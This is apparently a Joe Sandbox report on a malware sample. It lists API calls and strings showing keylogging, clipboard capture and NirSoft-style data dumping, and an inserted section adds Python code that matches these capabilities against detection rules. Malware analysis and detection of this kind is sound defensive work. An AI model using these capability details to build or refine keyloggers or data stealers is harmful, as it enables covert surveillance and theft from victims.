                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0043C015
                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0043C026
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043C02D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043C035
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction ID: 466c391f0f8cbe89267b517a2457401cac0d02a45389bc6ea158d6bce9fdb278
                                              • Opcode Fuzzy Hash: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction Fuzzy Hash: 65D0123A7812647BF21017755C8AF575A5DCFC96E2F000132FA05DA2E185704C018678
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00101F6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: a65f6be6619808f2296c9857c7b50387e59588a1f70a86d334897dda844c4041
                                              • Instruction ID: 0f2a3617dc242a5e84fddafc06e7fd20ab2ad322785a815307255b092d85de35
                                              • Opcode Fuzzy Hash: a65f6be6619808f2296c9857c7b50387e59588a1f70a86d334897dda844c4041
                                              • Instruction Fuzzy Hash: 27515B71A08206AAC7297714DD513BA7B94AB50740F308F58F4D5422E9EFFA8CD8DEC6
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000C3A2A
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(000C3AB9,?,?,000C3AB9,00125324), ref: 000D76CC
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(00125324,?,?,000C3AB9,00125324), ref: 000D76D5
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • Sleep.KERNEL32(000000FA,00125324), ref: 000C3AFC
                                              Strings
                                              • /sort "Visit Time" /stext ", xrefs: 000C3A76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "
                                              • API String ID: 368326130-1573945896
                                              • Opcode ID: 58c7076b995b71f80f9bc54b640d39fc6643559323f73664ca8abf2f40e95bf0
                                              • Instruction ID: 6ce54eea3bc43ee0d4568235917521f9124c45dce995a37009f49e5271b9f60e
                                              • Opcode Fuzzy Hash: 58c7076b995b71f80f9bc54b640d39fc6643559323f73664ca8abf2f40e95bf0
                                              • Instruction Fuzzy Hash: 3B314F31A102145ADB18F7B4DC96FEEB775AF92310F40406DF906A7193EF705E4ACA91
                                              APIs
                                              Strings
                                              • Un-Install PunkBuster Service, xrefs: 004098CF
                                              • Are you sure you want to un-install the PunkBuster Service?, xrefs: 004098DC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Are you sure you want to un-install the PunkBuster Service?$Un-Install PunkBuster Service
                                              • API String ID: 3519838083-2198055661
                                              • Opcode ID: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction ID: 3f86f169e8ea4f34bfe8433b3b75cf2069d93a569d5023850833cb461211cf54
                                              • Opcode Fuzzy Hash: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction Fuzzy Hash: 0831BF71C002899ECB00DF69C888BEDBBB4AB16314F5481BED455773E2C7385A08CB55
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00110B39,?,00000050,?,?,?,?,?), ref: 001109B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: a6c60df0ebe5c9b9d12d6dd1c12ed8721708bb5612d82b05af4e4429a5956fcd
                                              • Instruction ID: 83fcabeaacab525f02d941b5e658e74d0913e0a711645eaf57f9ceeb1c05d857
                                              • Opcode Fuzzy Hash: a6c60df0ebe5c9b9d12d6dd1c12ed8721708bb5612d82b05af4e4429a5956fcd
                                              • Instruction Fuzzy Hash: 62212462E04209A6F73E8B548920BD773AAAB5CB28F564434E94DD7202F7B2DDC0C350
                                              APIs
                                                • Part of subcall function 000F3519: EnterCriticalSection.KERNEL32(00130D18,?,00135D2C,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3524
                                                • Part of subcall function 000F3519: LeaveCriticalSection.KERNEL32(00130D18,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3561
                                                • Part of subcall function 000F38A5: __onexit.LIBCMT ref: 000F38AB
                                              • __Init_thread_footer.LIBCMT ref: 000CAEA7
                                                • Part of subcall function 000F34CF: EnterCriticalSection.KERNEL32(00130D18,00135D2C,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F34D9
                                                • Part of subcall function 000F34CF: LeaveCriticalSection.KERNEL32(00130D18,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F350C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                              • API String ID: 2974294136-3686566968
                                              • Opcode ID: 384a49daf9bafd927ba9db88ed499d8d775ade4668b4f004acc3f83c4f5d1fdf
                                              • Instruction ID: dabfe7460204875a4d252fd8405db8fb010e578308710fe1a46aa4fe602aeea6
                                              • Opcode Fuzzy Hash: 384a49daf9bafd927ba9db88ed499d8d775ade4668b4f004acc3f83c4f5d1fdf
                                              • Instruction Fuzzy Hash: D6218032A0021D9ACB14FBA4D892FED7775AF52724F50403DF502A7193EF306E4A8A91
                                              APIs
                                              • GetStockObject.GDI32 ref: 0043B068
                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043B07E
                                                • Part of subcall function 00498F70: GetVersionExA.KERNEL32 ref: 00498F97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$StockVersion
                                              • String ID: MS Shell Dlg 2
                                              • API String ID: 3343268070-3198668166
                                              • Opcode ID: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction ID: e155e28d74422bf90b24fc72c595fcbdcfc2968bb2b625db651e1d297fa305ef
                                              • Opcode Fuzzy Hash: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction Fuzzy Hash: 5A318E745083819FD724CF25C884B5BBBF0FBC8704F00892EE9A587392E7789548CB9A
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00133EE8,001345A8,?,?,?,?,?,?,?,000D4D7D,?,00000001,0000004C,00000000), ref: 000C49F1
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • GetLocalTime.KERNEL32(?,00133EE8,001345A8,?,?,?,?,?,?,?,000D4D7D,?,00000001,0000004C,00000000), ref: 000C4A4E
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 000C49E5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-1507639952
                                              • Opcode ID: 1a14310bb0277f57a1b377b4ebd0d144e9ac197432efee66795068e9f3876a15
                                              • Instruction ID: 8112e2be128ebf4c5cdd9aa7bf704f7e40df246bdb6ab0be0fa2b62bb6325dd9
                                              • Opcode Fuzzy Hash: 1a14310bb0277f57a1b377b4ebd0d144e9ac197432efee66795068e9f3876a15
                                              • Instruction Fuzzy Hash: 742138B1A042906BC354FB789C17BDE7BD56B93315F44400DF801476A3DB306589C7A7
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Message$get_FirewallEnabled failed: 0x%08lx
                                              • API String ID: 3519838083-3669246561
                                              • Opcode ID: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction ID: f105753d09791b4c671eee8698da4191506a5d5f18efc9bd2aac6efeec02826c
                                              • Opcode Fuzzy Hash: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction Fuzzy Hash: B911E671600108FFCB00EFA9C881ADE77A5AF48314F10827EF55AE71D1D7749A44C754
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 036292ce99a2c348d45a0d81ea6d99fbed21cc4db180d86682c4e51350edb735
                                              • Instruction ID: 75c687e05f4a9e6d35437e40c668dba121b997e545407c19b33833bd2aa0b984
                                              • Opcode Fuzzy Hash: 036292ce99a2c348d45a0d81ea6d99fbed21cc4db180d86682c4e51350edb735
                                              • Instruction Fuzzy Hash: F5111C725082545AC708EBA4D896EEE73E8AF96700F50052EF895C2293EF34DA84C656
                                              APIs
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • CloseHandle.KERNEL32(?), ref: 000CA7CA
                                              • UnhookWindowsHookEx.USER32 ref: 000CA7DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 34feed64bfb51223130a6be62de0a2430620acd01eacba0a37c1601205d73839
                                              • Instruction ID: 95b8b08662252aee162a2668348f7f9d19bf8ce55a53da2ba9a0a51f2ebb6a99
                                              • Opcode Fuzzy Hash: 34feed64bfb51223130a6be62de0a2430620acd01eacba0a37c1601205d73839
                                              • Instruction Fuzzy Hash: 8E01D431B082159BDB257734CC0BBEDBBB56B43314F80015DF44112693EBA15996C3D3
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Do you really want to cancel?$Question
                                              • API String ID: 3519838083-3547955172
                                              • Opcode ID: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction ID: bd53129a67d079509a4369cd051eac07b3f348f5042458483638bc8e6ad9a035
                                              • Opcode Fuzzy Hash: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction Fuzzy Hash: 3401B531C00199ABCB10E795C942FEEBB749F11324F60425BE461721D2D7781B48C695
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 000CAD5B
                                                • Part of subcall function 000C9B10: GetForegroundWindow.USER32(?,?,001340F8), ref: 000C9B3F
                                                • Part of subcall function 000C9B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 000C9B4B
                                                • Part of subcall function 000C9B10: GetKeyboardLayout.USER32(00000000), ref: 000C9B52
                                                • Part of subcall function 000C9B10: GetKeyState.USER32(00000010), ref: 000C9B5C
                                                • Part of subcall function 000C9B10: GetKeyboardState.USER32(?,?,001340F8), ref: 000C9B67
                                                • Part of subcall function 000C9B10: ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9B8A
                                                • Part of subcall function 000C9B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 000C9BE3
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 2738857842-2658077756
                                              • Opcode ID: c7444bfa16d0883874e16c3a158eb9badf7506e384d93b341f5f64a395f63584
                                              • Instruction ID: 5668e368085fd54c7bc5f1949972a484dd3bff56cdf675846b8aa32b6cf15195
                                              • Opcode Fuzzy Hash: c7444bfa16d0883874e16c3a158eb9badf7506e384d93b341f5f64a395f63584
                                              • Instruction Fuzzy Hash: 9FE09B2134062917C998337DAA2FFFD39629B43B65B80014DF4435BAD7DE554D5153C3
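The function above reaches GetForegroundWindow, GetKeyboardLayout, GetKeyboardState and ToUnicodeEx through subcall 000C9B10, which is the API set a keystroke-to-text translator needs; the earlier function at 000C3A2A carries the string `/sort "Visit Time" /stext "`, where `/stext` is the switch NirSoft command-line tools use to write their output to a text file. Listings in this shape are easy to triage mechanically. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses function blocks in the format shown on this page (the sample text is constructed from three blocks above, trimmed to the lines the parser reads) and matches each function against capability rules whose names and API sets are this example's own assumptions, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks in the shape of the Joe Sandbox
# IDA-plugin listing on this page, trimmed to the lines the parser reads.
SAMPLE_REPORT = """\
APIs
• GetKeyState.USER32(00000011), ref: 000CAD5B
  • Part of subcall function 000C9B10: GetForegroundWindow.USER32(?,?,001340F8), ref: 000C9B3F
  • Part of subcall function 000C9B10: GetKeyboardLayout.USER32(00000000), ref: 000C9B52
  • Part of subcall function 000C9B10: GetKeyboardState.USER32(?,?,001340F8), ref: 000C9B67
  • Part of subcall function 000C9B10: ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9B8A
Strings
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000C3A2A
• Sleep.KERNEL32(000000FA,00125324), ref: 000C3AFC
Strings
• /sort "Visit Time" /stext ", xrefs: 000C3A76
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "
APIs
• GetDC.USER32(00000000), ref: 0043C015
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0043C026
Strings
Similarity
• API ID: CapsDevice$Release
• String ID:
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)\b(?:.*?\bref: (?P<ref>[0-9A-Fa-f]+))?")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: [0-9A-Fa-f]+\s*$")


@dataclass
class FunctionBlock:
    first_ref: str = ""            # address of the first direct call; lies inside the function
    apis: set = field(default_factory=set)          # APIs called directly
    subcall_apis: set = field(default_factory=set)  # APIs reached through "Part of subcall"
    strings: list = field(default_factory=list)     # entries of the Strings section
    string_id: str = ""            # "$"-joined String ID from the Similarity section

    def reachable_apis(self):
        return self.apis | self.subcall_apis


def parse_blocks(text):
    """Split the listing into FunctionBlocks; every block opens with an 'APIs' header."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None or not line:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                continue
            if m.group("callee"):
                current.subcall_apis.add(m.group("name"))
            else:
                current.apis.add(m.group("name"))
                if not current.first_ref and m.group("ref"):
                    current.first_ref = m.group("ref")
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append(m.group("text"))
        elif section == "Similarity" and line.startswith("• String ID:"):
            current.string_id = line.split(":", 1)[1].strip()
    return blocks


# Capability rules (this example's own names and API sets, not Joe Sandbox signatures):
# every API in the set must be reachable directly or via a subcall, and the regex,
# when present, must match one of the function's strings or its String ID.
RULES = {
    "keystroke_translation": (
        {"GetForegroundWindow", "GetKeyboardLayout", "GetKeyboardState", "ToUnicodeEx"}, None),
    "nirsoft_style_text_dump": (set(), re.compile(r'/stext\s*"')),
    "screen_metrics": ({"GetDC", "GetDeviceCaps"}, None),
}


def match_rules(block):
    hits, reachable = [], block.reachable_apis()
    for name, (needed, string_re) in RULES.items():
        if not needed <= reachable:
            continue
        if string_re and not any(string_re.search(s) for s in block.strings + [block.string_id]):
            continue
        hits.append(name)
    return hits


def triage(text):
    """Map the address of each function's first direct call to the rules it matched."""
    out = {}
    for block in parse_blocks(text):
        hits = match_rules(block)
        if hits:
            out[block.first_ref] = hits
    return out


if __name__ == "__main__":
    for addr, rules in triage(SAMPLE_REPORT).items():
        print(addr, ", ".join(rules))
```

Rules are deliberately matched against reachable APIs rather than direct calls only: in this listing the keyboard translation lives in subcall 000C9B10 and only GetKeyState is called directly, so a rule restricted to direct calls would miss it. The address of the first direct call is used as the function key because the listing gives no function start address, only the image base of the dump.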
                                              APIs
                                              Strings
                                              • your program, xrefs: 00407D8F
                                              • 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6), xrefs: 00407D94
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)$your program
                                              • API String ID: 3519838083-1349685460
                                              • Opcode ID: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction ID: 1523a34304f5ca219838624e3a2edcca56625a63025bcd44c9342f38124bf159
                                              • Opcode Fuzzy Hash: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction Fuzzy Hash: C6E09270E505699ACB10AFA54C427DE7AA09B04748F10453FE051E72C1DBBC594087ED
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 000CADB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              • Opcode ID: a2e8998703f2a4651b6acd06749e8b6f78c31a2dbf6eff5dca6054e2df74df2a
                                              • Instruction ID: 1c5559284e9e250df2a8b619f2b562c186e52610be755d909706936a07287864
                                              • Opcode Fuzzy Hash: a2e8998703f2a4651b6acd06749e8b6f78c31a2dbf6eff5dca6054e2df74df2a
                                              • Instruction Fuzzy Hash: 9EE086317007291BC56837BDDA1EFBD29619B43767F80010CF8534BDD6DA55495013D3
                                              APIs
                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ObjectProcessSingleTerminateWait
                                              • String ID: pth_unenc
                                              • API String ID: 1872346434-4028850238
                                              • Opcode ID: 9b9e7f5e1b40906d7cfc34f11a4715e5e60031f7a0680760659966f4d1a16e86
